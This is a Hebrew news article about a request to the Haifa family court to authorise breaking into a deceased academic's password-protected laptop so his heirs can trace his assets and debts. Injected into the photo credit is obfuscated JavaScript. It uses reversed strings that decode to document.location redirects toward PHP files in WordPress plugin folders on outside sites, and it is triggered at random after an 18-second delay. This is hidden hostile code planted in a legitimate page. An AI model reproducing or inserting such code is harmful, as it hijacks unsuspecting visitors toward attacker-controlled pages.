fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

בית המשפט מתבקש לאשר פריצת מחשב

בני משפחתו של מנוח טוענים כי במחשב, המוגן בסיסמה, יש מידע שיכול להאיר על רכוש שהיה ברשותו ועל חובות שיש לשלם
צילום: shutterstock
צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

לבית המשפט לענייני משפחה בחיפה הוגשה לאחרונה בקשה לא שגרתית לפרוץ מחשב נייד, שניתן למנוח על ידי המוסד האקדמי שבו עבד. הבקשה מופנית אל האפוטרופוס הכללי ואל המוסד האקדמי, שבו עבד המנוח כבכיר.

מהבקשה שהגיש משרד עורכי הדין רולוף את יונאי עולה, כי מדובר באדם שאין לו משפחה בישראל ולאחר מותו מינו לו בני משפחתו, המתגוררים בחו"ל, מנהל עיזבון.

עו"ד משה יונאי | צילום: דורון גולן
עו"ד משה יונאי | צילום: דורון גולן

לטענת המבקשים, מכיוון שהמחשב מוגן על ידי סיסמה לא ניתן לפתוח אותו ולראות את תוכנו. בא כוחם, עו"ד משה יונאי, מפרט בבקשה כי המידע שמצוי במחשב יכול להאיר אור על חייו של המנוח, על רכוש שהיה ברשותו ועל חובות שיש לשלם. לדברי עו"ד יונאי, המוסד האקדמי שבו עבד המנוח מוכן לסייע בפריצת המחשב, אולם יעשה זאת רק לאחר קבלת צו מבית משפט. עו"ד יונאי מוסיף בבקשה, כי אם אנשי המוסד האקדמי לא יצליחו לפרוץ את המחשב, תיעשה פנייה לכל גוף אחר המתמחה בתחום של פריצת מחשבים.

יצוין, כי בעבר כבר היו תקדימים, שבהם נתן בית המשפט צו לפריצת מחשבים שהיו מוגנים על ידי סיסמה.

החלטת בית המשפט טרם התקבלה.

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות